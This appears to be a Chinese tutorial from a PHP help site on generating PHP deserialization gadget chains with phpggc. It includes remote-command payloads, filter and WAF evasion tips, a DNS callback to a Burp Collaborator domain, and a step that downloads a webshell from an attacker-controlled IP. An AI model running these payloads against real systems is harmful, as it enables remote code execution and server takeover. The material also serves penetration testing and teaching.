kali怎么挖php漏洞_用phpggc生成php gadget链打洞【技巧】

phpggc 不能直接攻击 Kali 中运行的 PHP 应用,它仅生成反序列化 gadget 链 payload,需手动注入到存在 unserialize 的目标点;Kali 是攻击机而非靶机,成功利用依赖环境匹配、正确编码及后续触发方式。

kali怎么挖php漏洞_用phpggc生成php gadget链打洞【技巧】

phpggc 能不能直接打 Kali 里跑的 PHP 应用

不能——phpggc 本身不发请求、不连接目标、不执行反序列化,它只生成 gadget 链 payload。你得自己把它塞进能触发反序列化的地方(比如 unserialize($_GET['data'])),Kali 只是你的攻击机环境,不是靶机。

常见误区是以为在 Kali 上跑通 phpggc 就等于“打洞成功”,其实它连靶机 HTTP 接口都没碰过。真正起作用的是你后续的手动或自动化利用方式。

  • phpggc 输出的是 raw 字节流(如 O:8:"stdClass":1:{s:4:"test";s:5:"hello";}),需 base64 编码或 urlencode 后传给目标
  • PHP 版本必须和靶机一致,否则 gadget 链会因类/方法不存在而报错:Fatal error: Uncaught Error: Class not found
  • Kali 自带的 phpggc 通常较旧,建议从 GitHub 拉最新版:git clone https://github.com/ambionics/phpggc

怎么选 gadget 链:看靶机装了哪些库

没有万能链。phpggc 的核心逻辑是“找已安装组件里的危险方法组合”,所以必须先确认靶机环境。比如:

  • 靶机用了 monolog 1.x + php 7.4 → 用 phpggc monolog/rce1 'phpinfo();'
  • 靶机有 laravel 5.8 + swiftmailerphpggc laravel/rce1 'system("id")'
  • 纯原生 PHP(无框架)→ 基本只能靠 phpggc php/fritz9phpggc php/generate_arrays 等极有限链,成功率低

漏掉依赖检查是失败主因。别猜,用 curl浏览器访问 /composer.json/vendor/autoload.php 或报错页面里的 class 名,确认真实组件版本。

立即学习PHP免费学习笔记(深入)”;

阿里妈妈·创意中心

阿里妈妈·创意中心

阿里妈妈营销创意中心

下载

payload 怎么送进去:绕过常见过滤和编码陷阱

生成的 gadget 链常因传输过程被破坏而失效。关键点不在 phpggc 本身,而在你怎么把它喂给目标:

  • 如果目标用 base64_decode($_GET['data']) → 直接用 phpggc --fast-destruct --phar -b xxx 生成 base64 payload
  • 如果参数名是 input 且经过 urldecode() 多次 → 先 urlencodе 一次,再手工 double-urlencode(%252F 这种)
  • 遇到 json_decode() 包裹反序列化 → 不能直接塞 gadget,得先构造合法 JSON,再在值里藏 payload(如 {"data":"O:8:/"..."}"
  • 某些 WAF 会拦截 O:s: 等序列化标识符 → 改用 --polyglot 模式生成多格式 payload(但兼容性下降)

最稳妥的调试方式:在本地搭同版本 PHP 环境,用 var_dump(unserialize($payload)) 看是否报错,再逐步加 urlencode/base64 测试。

为什么本地复现成功,打靶机却没回显

回显缺失 ≠ 利用失败。很多 gadget 链走的是 __destruct__wakeup,执行完就退出,根本不会 echo 或 print。这时候得换思路:

  • 用 DNSLog 验证命令是否执行:phpggc monolog/rce1 'nslookup yourdomain.burpcollab.net'
  • 写文件类链(如 phpggc guzzle/rce1 'file_put_contents("/tmp/pwn", "test");')后主动去读
  • 靶机开了 allow_url_fopen=On?试试 file_get_contents("http://your-ip:8000/shell.php") 下载 webshell
  • 注意 PHP disable_functions —— 如果禁了 systemexecshell_exec,就得换 mail()error_log()passthru() 等未被禁的函数

真正卡住的往往不是 gadget 链生成,而是对靶机运行时限制(open_basedirdisable_functionssafe_mode 已废弃但配置残留)缺乏验证。先 phpinfo(),再动手。

https://www.php.cn/faq/2035837.html

发表回复

Your email address will not be published. Required fields are marked *